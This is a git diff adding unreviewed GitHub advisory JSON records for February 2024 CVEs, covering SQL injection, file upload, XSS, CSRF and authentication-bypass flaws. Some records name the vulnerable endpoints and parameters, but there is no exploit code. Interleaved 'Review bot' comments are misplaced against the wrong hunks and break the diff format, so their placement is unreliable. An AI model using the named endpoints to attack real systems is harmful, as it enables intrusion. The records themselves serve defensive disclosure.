diff --git a/advisories/unreviewed/2024/02/GHSA-2xhq-4fmf-r8g2/GHSA-2xhq-4fmf-r8g2.json b/advisories/unreviewed/2024/02/GHSA-2xhq-4fmf-r8g2/GHSA-2xhq-4fmf-r8g2.json
new file mode 100644
index 0000000000000..be779f18c66e2
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-2xhq-4fmf-r8g2/GHSA-2xhq-4fmf-r8g2.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2xhq-4fmf-r8g2",
+ "modified": "2024-02-07T00:30:25Z",
+ "published": "2024-02-07T00:30:25Z",
+ "aliases": [
+ "CVE-2024-1262"
+ ],
+ "details": "A vulnerability, which was classified as critical, has been found in Juanpao JPShop up to 1.5.02. This issue affects the function actionUpdate of the file /api/controllers/merchant/design/MaterialController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-253001 was assigned to this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1262"
+ },
+ {
+ "type": "WEB",
+ "url": "https://note.zhaoj.in/share/C1btykKlahBD"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.253001"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.253001"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-434"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T23:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3298-46rv-mjjj/GHSA-3298-46rv-mjjj.json b/advisories/unreviewed/2024/02/GHSA-3298-46rv-mjjj/GHSA-3298-46rv-mjjj.json
new file mode 100644
index 0000000000000..496dce5020c9e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3298-46rv-mjjj/GHSA-3298-46rv-mjjj.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3298-46rv-mjjj",
+ "modified": "2024-02-06T03:32:59Z",
+ "published": "2024-02-01T12:30:23Z",
+ "aliases": [
+ "CVE-2023-51509"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Metagauss RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login allows Reflected XSS.This issue affects RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login: from n/a through 5.2.4.1.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51509"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/custom-registration-form-builder-with-submission-manager/wordpress-registrationmagic-plugin-5-2-4-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T12:15:53Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-32c5-v2g2-22x7/GHSA-32c5-v2g2-22x7.json b/advisories/unreviewed/2024/02/GHSA-32c5-v2g2-22x7/GHSA-32c5-v2g2-22x7.json
new file mode 100644
index 0000000000000..efc30612f7dda
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-32c5-v2g2-22x7/GHSA-32c5-v2g2-22x7.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-32c5-v2g2-22x7",
+ "modified": "2024-02-08T21:30:38Z",
+ "published": "2024-02-08T21:30:38Z",
+ "aliases": [
+ "CVE-2024-23764"
+ ],
+ "details": "Certain WithSecure products allow Local Privilege Escalation. This affects WithSecure Client Security 15 and later, WithSecure Server Security 15 and later, WithSecure Email and Server Security 15 and later, and WithSecure Elements Endpoint Protection 17 and later.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23764"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.withsecure.com/en/support/security-advisories"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.withsecure.com/en/support/security-advisories/cve-2024-23764"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T19:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-32qr-r9g8-9jgp/GHSA-32qr-r9g8-9jgp.json b/advisories/unreviewed/2024/02/GHSA-32qr-r9g8-9jgp/GHSA-32qr-r9g8-9jgp.json
new file mode 100644
index 0000000000000..73e2fb51d463b
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-32qr-r9g8-9jgp/GHSA-32qr-r9g8-9jgp.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-32qr-r9g8-9jgp",
+ "modified": "2024-02-02T03:30:32Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2023-32333"
+ ],
+ "details": "IBM Maximo Asset Management 7.6.1.3 could allow a remote attacker to log into the admin panel due to improper access controls. IBM X-Force ID: 255073.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32333"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/255073"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7112388"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-284"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T02:15:16Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-32vr-pw5g-2xc5/GHSA-32vr-pw5g-2xc5.json b/advisories/unreviewed/2024/02/GHSA-32vr-pw5g-2xc5/GHSA-32vr-pw5g-2xc5.json
new file mode 100644
index 0000000000000..4e2b64c705893
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-32vr-pw5g-2xc5/GHSA-32vr-pw5g-2xc5.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-32vr-pw5g-2xc5",
+ "modified": "2024-02-05T06:30:29Z",
+ "published": "2024-02-05T06:30:29Z",
+ "aliases": [
+ "CVE-2023-47170"
+ ],
+ "details": "Rejected reason: This candidate was in a CNA pool that was not assigned to any issues during 2023.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47170"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T05:15:07Z"
+ }
+}
\ No newline at end of file
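Review bot: The second hunk on this line (GHSA-32vr-pw5g-2xc5) publishes a live advisory whose `details` text is the CVE rejection notice for CVE-2023-47170 ("Rejected reason: This candidate was in a CNA pool that was not assigned to any issues during 2023"), yet no `withdrawn` timestamp is set. Any consumer that matches on the `aliases` entry will raise a finding for a candidate that was never assigned to a vulnerability. If the import pipeline cannot skip rejected candidates outright, the record should carry `"withdrawn": "<WITHDRAWN_TIMESTAMP_PLACEHOLDER>"` next to `published` so OSV-aware tooling filters it, and the empty `severity`/`affected` arrays then read as intentional rather than as missing data.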
diff --git a/advisories/unreviewed/2024/02/GHSA-338x-q4qx-prw7/GHSA-338x-q4qx-prw7.json b/advisories/unreviewed/2024/02/GHSA-338x-q4qx-prw7/GHSA-338x-q4qx-prw7.json
new file mode 100644
index 0000000000000..6b28c539fdf3a
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-338x-q4qx-prw7/GHSA-338x-q4qx-prw7.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-338x-q4qx-prw7",
+ "modified": "2024-02-08T03:32:45Z",
+ "published": "2024-02-08T03:32:45Z",
+ "aliases": [
+ "CVE-2024-24018"
+ ],
+ "details": "A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass in crafted offset, limit, and sort parameters to perform SQL injection via /system/dataPerm/list",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24018"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/201206030/novel-plus"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24018.txt"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T01:15:27Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-33cc-g737-2r5g/GHSA-33cc-g737-2r5g.json b/advisories/unreviewed/2024/02/GHSA-33cc-g737-2r5g/GHSA-33cc-g737-2r5g.json
new file mode 100644
index 0000000000000..8089b85a7bdb9
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-33cc-g737-2r5g/GHSA-33cc-g737-2r5g.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-33cc-g737-2r5g",
+ "modified": "2024-02-06T18:30:21Z",
+ "published": "2024-02-06T18:30:21Z",
+ "aliases": [
+ "CVE-2024-1253"
+ ],
+ "details": "A vulnerability, which was classified as critical, has been found in Beijing Baichuo Smart S40 Management Platform up to 20240126. Affected by this issue is some unknown functionality of the file /useratte/web.php of the component Import Handler. The manipulation of the argument file_upload leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252992. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1253"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/b51s77/cve/blob/main/upload.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252992"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252992"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-434"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T17:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-33fg-vcj3-g326/GHSA-33fg-vcj3-g326.json b/advisories/unreviewed/2024/02/GHSA-33fg-vcj3-g326/GHSA-33fg-vcj3-g326.json
new file mode 100644
index 0000000000000..6eb037c656c82
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-33fg-vcj3-g326/GHSA-33fg-vcj3-g326.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-33fg-vcj3-g326",
+ "modified": "2024-02-06T06:30:30Z",
+ "published": "2024-02-06T06:30:30Z",
+ "aliases": [
+ "CVE-2023-33049"
+ ],
+ "details": "Transient DOS in Multi-Mode Call Processor due to UE failure because of heap leakage.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33049"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-33hj-8g8g-96xr/GHSA-33hj-8g8g-96xr.json b/advisories/unreviewed/2024/02/GHSA-33hj-8g8g-96xr/GHSA-33hj-8g8g-96xr.json
new file mode 100644
index 0000000000000..860c0d58255e0
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-33hj-8g8g-96xr/GHSA-33hj-8g8g-96xr.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-33hj-8g8g-96xr",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0660"
+ ],
+ "details": "The Formidable Forms – Contact Form, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.7.2. This is due to missing or incorrect nonce validation on the update_settings function. This makes it possible for unauthenticated attackers to change form settings and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0660"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3026901/formidable/tags/6.8/classes/controllers/FrmFormsController.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b983d22b-6cd2-4450-99e2-88bb149091fe?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-34rx-mprw-whv5/GHSA-34rx-mprw-whv5.json b/advisories/unreviewed/2024/02/GHSA-34rx-mprw-whv5/GHSA-34rx-mprw-whv5.json
new file mode 100644
index 0000000000000..308b50b06f2fb
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-34rx-mprw-whv5/GHSA-34rx-mprw-whv5.json
@@ -0,0 +1,43 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-34rx-mprw-whv5",
+ "modified": "2024-02-05T18:31:37Z",
+ "published": "2024-02-05T18:31:37Z",
+ "aliases": [
+ "CVE-2024-23054"
+ ],
+ "details": "An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution due to a package listed in ++plone++static/components not existing in the public package index (npm).",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23054"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/c0d3x27/CVEs/blob/main/CVE-2024-23054/README.md"
+ },
+ {
+ "type": "WEB",
+ "url": "http://plone.com"
+ },
+ {
+ "type": "WEB",
+ "url": "http://ploneorg.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T16:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-34vw-rxxh-698f/GHSA-34vw-rxxh-698f.json b/advisories/unreviewed/2024/02/GHSA-34vw-rxxh-698f/GHSA-34vw-rxxh-698f.json
new file mode 100644
index 0000000000000..5045b610010f8
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-34vw-rxxh-698f/GHSA-34vw-rxxh-698f.json
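Review bot: The `references` array in this hunk carries two bare plain-http domains, `http://plone.com` and `http://ploneorg.com`, neither of which points to an advisory, a fix or a vendor statement; `ploneorg.com` in particular does not appear to be a project-controlled domain (the project publishes at plone.org), so it is presumably copied verbatim from the NVD reference list. A reader who follows the link from a security advisory gets no remediation information and may be sent to an unrelated or squatted site over an unauthenticated transport. Since `affected` is empty and no fixed version is recorded, the only actionable reference here is the write-up on GitHub; consider dropping the two bare domains or confirming their ownership before the entry leaves the unreviewed tree. The same pattern appears in the next hunk (GHSA-34vw-rxxh-698f), whose references include `http://dir-816a2.com` alongside the D-Link bulletin URLs.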
@@ -0,0 +1,47 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-34vw-rxxh-698f",
+ "modified": "2024-02-08T18:30:39Z",
+ "published": "2024-02-08T18:30:39Z",
+ "aliases": [
+ "CVE-2024-24321"
+ ],
+ "details": "An issue in Dlink DIR-816A2 v.1.10CNB05 allows a remote attacker to execute arbitrary code via the wizardstep4_ssid_2 parameter in the sub_42DA54 function.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24321"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/dkjiayu/Vul/blob/main/DIR816A2-dir_setWanWifi.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dlink.com/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dlink.com/en/security-bulletin/"
+ },
+ {
+ "type": "WEB",
+ "url": "http://dir-816a2.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T18:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-35fv-vgfw-h8mj/GHSA-35fv-vgfw-h8mj.json b/advisories/unreviewed/2024/02/GHSA-35fv-vgfw-h8mj/GHSA-35fv-vgfw-h8mj.json
new file mode 100644
index 0000000000000..75adef4942a7c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-35fv-vgfw-h8mj/GHSA-35fv-vgfw-h8mj.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-35fv-vgfw-h8mj",
+ "modified": "2024-02-07T09:30:31Z",
+ "published": "2024-02-07T09:30:31Z",
+ "aliases": [
+ "CVE-2024-1078"
+ ],
+ "details": "The Quiz Maker plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ays_quick_start() and add_question_rows() functions in all versions up to, and including, 6.5.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary quizzes.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1078"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3032035/quiz-maker/tags/6.5.2.5/admin/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7ba2b270-5f02-4cd8-8a22-1723c3873d67?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T08:15:42Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-365x-5gg7-66qg/GHSA-365x-5gg7-66qg.json b/advisories/unreviewed/2024/02/GHSA-365x-5gg7-66qg/GHSA-365x-5gg7-66qg.json
new file mode 100644
index 0000000000000..fd1a2a7bb5a93
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-365x-5gg7-66qg/GHSA-365x-5gg7-66qg.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-365x-5gg7-66qg",
+ "modified": "2024-02-06T21:30:26Z",
+ "published": "2024-02-06T21:30:26Z",
+ "aliases": [
+ "CVE-2024-1254"
+ ],
+ "details": "A vulnerability, which was classified as critical, was found in Beijing Baichuo Smart S20 Management Platform up to 20231120. This affects an unknown part of the file /sysmanage/sysmanageajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252993 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1254"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rockersiyuan/CVE/blob/main/Smart%20S20.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252993"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252993"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T19:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-36w5-pmj5-pph2/GHSA-36w5-pmj5-pph2.json b/advisories/unreviewed/2024/02/GHSA-36w5-pmj5-pph2/GHSA-36w5-pmj5-pph2.json
new file mode 100644
index 0000000000000..5cc7ddf820be7
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-36w5-pmj5-pph2/GHSA-36w5-pmj5-pph2.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-36w5-pmj5-pph2",
+ "modified": "2024-02-02T18:30:32Z",
+ "published": "2024-02-02T18:30:32Z",
+ "aliases": [
+ "CVE-2023-47562"
+ ],
+ "details": "An OS command injection vulnerability has been reported to affect Photo Station. If exploited, the vulnerability could allow authenticated users to execute commands via a network.\n\nWe have already fixed the vulnerability in the following version:\nPhoto Station 6.4.2 ( 2023/12/15 ) and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47562"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-24-08"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-77"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-375g-qj2r-88m9/GHSA-375g-qj2r-88m9.json b/advisories/unreviewed/2024/02/GHSA-375g-qj2r-88m9/GHSA-375g-qj2r-88m9.json
new file mode 100644
index 0000000000000..1b2ce77baddb9
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-375g-qj2r-88m9/GHSA-375g-qj2r-88m9.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-375g-qj2r-88m9",
+ "modified": "2024-02-02T09:30:20Z",
+ "published": "2024-02-02T09:30:20Z",
+ "aliases": [
+ "CVE-2023-45734"
+ ],
+ "details": "\nin OpenHarmony v3.2.4 and prior versions allow an adjacent attacker arbitrary code execution through out-of-bounds write.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45734"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-787"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T07:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-37j2-h4x2-rp3v/GHSA-37j2-h4x2-rp3v.json b/advisories/unreviewed/2024/02/GHSA-37j2-h4x2-rp3v/GHSA-37j2-h4x2-rp3v.json
new file mode 100644
index 0000000000000..85a3fc44b8162
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-37j2-h4x2-rp3v/GHSA-37j2-h4x2-rp3v.json
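Review bot: The `details` string in this hunk is truncated at the front: it opens with a literal `\n` and then "in OpenHarmony v3.2.4 and prior versions allow an adjacent attacker ...", so the grammatical subject, the affected subsystem or component, is missing and the record does not say what in OpenHarmony carries the out-of-bounds write. The text is presumably imported verbatim from NVD, but as stored it leaves a reader with only the CWE-787 tag and the Gitee disclosure link to identify the component. Before the entry leaves the unreviewed tree, the leading and trailing `\n` should be stripped and the missing subject restored from the linked 2024-02 disclosure, e.g. `"details": "<COMPONENT_PLACEHOLDER> in OpenHarmony v3.2.4 and prior versions allow an adjacent attacker arbitrary code execution through out-of-bounds write."`.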
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-37j2-h4x2-rp3v",
+ "modified": "2024-02-06T18:30:21Z",
+ "published": "2024-02-06T18:30:21Z",
+ "aliases": [
+ "CVE-2023-40545"
+ ],
+ "details": "Authentication bypass when an OAuth2 Client is using client_secret_jwt as its authentication method on affected 11.3 versions via specially crafted requests.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40545"
+ },
+ {
+ "type": "WEB",
+ "url": "https://docs.pingidentity.com/r/en-us/pingfederate-113/hro1701116403236"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.pingidentity.com/s/article/SECADV040-PingFederate-OAuth-Client-Authentication-Bypass"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.pingidentity.com/en/resources/downloads/pingfederate/previous-releases.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-306"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T18:15:58Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-37r9-v4pm-3344/GHSA-37r9-v4pm-3344.json b/advisories/unreviewed/2024/02/GHSA-37r9-v4pm-3344/GHSA-37r9-v4pm-3344.json
new file mode 100644
index 0000000000000..eaacfceba91f0
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-37r9-v4pm-3344/GHSA-37r9-v4pm-3344.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-37r9-v4pm-3344",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0954"
+ ],
+ "details": "The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting through editing context via the 'data-eael-wrapper-link' wrapper in all versions up to, and including, 5.9.7 due to insufficient input sanitization and output escaping on user supplied protocols. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0954"
+ },
+ {
+ "type": "WEB",
